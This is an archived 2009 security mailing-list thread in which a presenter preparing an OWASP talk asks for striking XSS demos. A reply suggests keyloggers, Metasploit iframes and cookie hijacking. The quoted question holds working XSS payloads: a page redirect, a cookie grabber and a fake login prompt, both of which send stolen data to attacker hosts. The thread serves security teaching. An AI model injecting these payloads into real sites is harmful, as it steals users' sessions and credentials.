Home page logo
/

pauldotcom logo PaulDotCom mailing list archives

Cool things to inject via XSS
From: mmcgrew1 at mail.csuchico.edu (Michael McGrew)
Date: Thu, 28 May 2009 15:22:03 -0700

You could inject a JavaScript keylogger that can be seen here in the middler
http://code.google.com/p/middler/source/browse/trunk/middlerlib/plugins/plugin-keylogger-INGUARDIANS-ONLY.py

<http://code.google.com/p/middler/source/browse/trunk/middlerlib/plugins/plugin-keylogger-INGUARDIANS-ONLY.py>Also,
a metasploit iframe, which can be seen in the next file in the plugins
directory. Cookie grabbing can be very interesting. Take for example a full
SSL site with proper SSL only cookies, but the site has a XSS vulnerability.
Grab the cookie, put it in your browser, and you could potentially have a
session hijack, even though the site has full proper implemented SSL, all
from a little XSS hole.

On Thu, May 28, 2009 at 11:50 AM, Adrian Crenshaw <irongeek at irongeek.com>wrote:

Ok, I've got yet another presentation coming up, this time on the OWASP Top
10 and Mutillidae. One of the things I'm going to cover is XSS. The
canonical example of course is:

<script>alert("XSS");</script>

but that is boring, and gives folks the impression that XSS is not that
serious.  Better short eample swoul be:

*Redirect traffic to your site:*
<script>window.location = "http://www.irongeek.com/";</script>

*A little cookie Grabbing:*
<script>
new Image().src="http://some-ip/mutillidae/catch.php?cookie=
"+encodeURI(document.cookie);
</script>
*
Or maybe a password form to make people think they have to login, but it
just grabs the credentials:*
<script>
username=prompt('Please enter your username',' ');
password=prompt('Please enter your password',' ');
document.write("<img src=\"http://attacker.hak/catch.php?username=
"+username+"&password="+password+"\">");
</script>

What are other cool thing to inject, besides maybe BeEF, that shows of how
XSS can be a big deal?

Thanks,
Adrian


_______________________________________________
Pauldotcom mailing list
Pauldotcom at mail.pauldotcom.com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://mail.pauldotcom.com/pipermail/pauldotcom/attachments/20090528/8fd33096/attachment.htm 


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault